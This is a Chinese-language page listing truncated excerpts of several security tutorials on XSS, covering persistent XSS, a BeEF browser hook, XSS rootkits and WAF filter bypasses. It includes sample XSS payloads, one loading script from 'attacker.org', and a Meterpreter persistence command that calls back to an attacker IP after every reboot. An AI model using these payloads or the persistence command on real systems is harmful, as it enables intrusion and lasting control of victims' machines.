变种XSS:持久控制】的更多相关文章

变种XSS:持久控制 tig3r · 2015/11/30 10:42 0x00 引言 首先声明,这不是一个新洞,看过 Homakov 文章(最后附)以及译文的人想必对这种漏洞有所了解. 但原文写的太过简单(没有说明利用条件.情景和特性),且译文和我的理解略有偏差,于是就有了这篇文章. 这种漏洞已经存在一段时间了,有没有被利用过尚不得知,虽然利用条件较苛刻,但是当符合条件的站点被攻击后, 影响面和影响程度巨大,并且普通用户不知如何清除, 可导致长期持续攻击. 2014年底的时候,这种漏洞的利用条…
Meterpreter的persisitence脚本允许主任meterpreter代理,以确保系统重启之后Meterpreter还能运行。如果是反弹连接方式,可以设置连接攻击机的时间间隔。如果是绑定方式,可以设置在指定时间按绑定开放端口。 举例:run persistence -X -i 50 -p 442 -r 192.168.33.129 此脚本让系统开机自启动(-X),50秒(-i 50)重连一次,使用的端口是443(-p 443),连接的目的IP为192.168.33.129. use…
全文概览 浏览器攻击方法流程 攻击浏览器一般分为几个阶段,如下图 整个过程分为三个步骤,第一步是初始化控制,第二步是持续控制,第三步是攻击.在第三步中的七个攻击方法是可以交叉的,比如可以同时攻击用户和攻击Web应用.接下来会一章一章的介绍这些内容.这一章介绍初始化控制. 初始化控制 首先在这一章中会介绍初始化控制的方法.初始化控制也就是想办法让BeEF服务器勾子(还记得上一章的hook.js吗)在用户浏览器中运行,勾子初次运行会收集一些有用的信息返回给服务器,并做好后续准备.初始化控制常见的攻击…
什么是存储性XSS那? 通俗理解就是”xss“语句存在服务器上,可以一直被客户端浏览使用,所有登陆某一个存在”存储性xss“的页面的人,都会中招,可以是管理员,可以是普通的用户,所以他的危害是持续性的,造成的后果也是巨大的. 跨站脚本(XSS, Cross Site Script)攻击指的是,攻击者可以让某网站执行一段非法脚本.这种情况很常见,比如提交一个表单用于修改用户名,我们可以在文本框中输入一些特殊字符,比如 <, >, ‘, ” 等,检查一下用户名是否正确修改了. 假如有下面一个tex…
0x00 XSS Rootkit介绍 Rootkit概念: 一种特殊的恶意软件            类型: 常见为木马.后门等            特点: 隐蔽 持久控制 谈到XSS,一般都是想到反射型.存储型及dom xss,脑海中往往就是点击链接然后弹窗的形式,这次学习的是ROORKIT XSS(持久化XSS),就是通过某些手段嵌入一些js代码,从而获取一个持久控制浏览器客户端的“Rootkit”的一种攻击.下面是Roorkit XSS的思维导图 0x01 利用点-网站用户信息 思维导图…
初始测试 1.使用无害的payload,类似<b>,<i>,<u>观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过滤<>等等: 2.如果过滤闭合标签,尝试无闭合标签的payload(<b,<i,<marquee)观察响应: 3.尝试以下的payload <script>alert(1);</script><script>prompt(1);</script><script…
XSS现代WAF规则探测及绕过技术初始测试 1.使用无害的payload,类似<b>,<i>,<u>观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过滤<>等等: 2.如果过滤闭合标签,尝试无闭合标签的payload(<b,<i,<marquee)观察响应: 3.尝试以下的payload <script>alert();</script> <script>prompt();</scri…
0x00前言 我们友情进行XSS检查,偶然跳出个小弹窗,其中我们总结了一些平时可能用到的XSS插入方式,方便我们以后进行快速检查,也提供了一定的思路,其中XSS有反射.存储.DOM这三类,至于具体每个类别的异同之处,本文不做学术介绍,直接介绍实际的插入方式. 0x01 常规插入及其绕过 1 Script 标签 绕过进行一次移除操作:<scr<script>ipt>alert("XSS")</scr<script>ipt>Script 标签…
关于xss攻击,网上相关的介绍很多,一搜索也是一大堆,这里我就对自己感兴趣的一些内容做个总结. xss简单介绍 成因:xss是将恶意代码(多是JavaScript)插入html代码中. 分类: 1. 反射型 2. 存储型 3. DOM型 1. 什么是反射型? 攻击者构造可执行JavaScript的攻击链接,发送给受害者,多用于获取cookie,因为cookie可以使你伪装成受害者来登录.还可以定向到别的网站,下载病毒链接等等. 2. DOM型xss.反射型xss和存储型xss的区别? 反射型xs…
0x00 目录 0x01 常规插入及其绕过 1 Script 标签 绕过进行一次移除操作: <scr<script>ipt>alert("XSS")</scr<script>ipt>Script 标签可以用于定义一个行内的脚本或者从其他地方加载脚本:<script>alert("XSS")</script><script src="http://attacker.org/mali…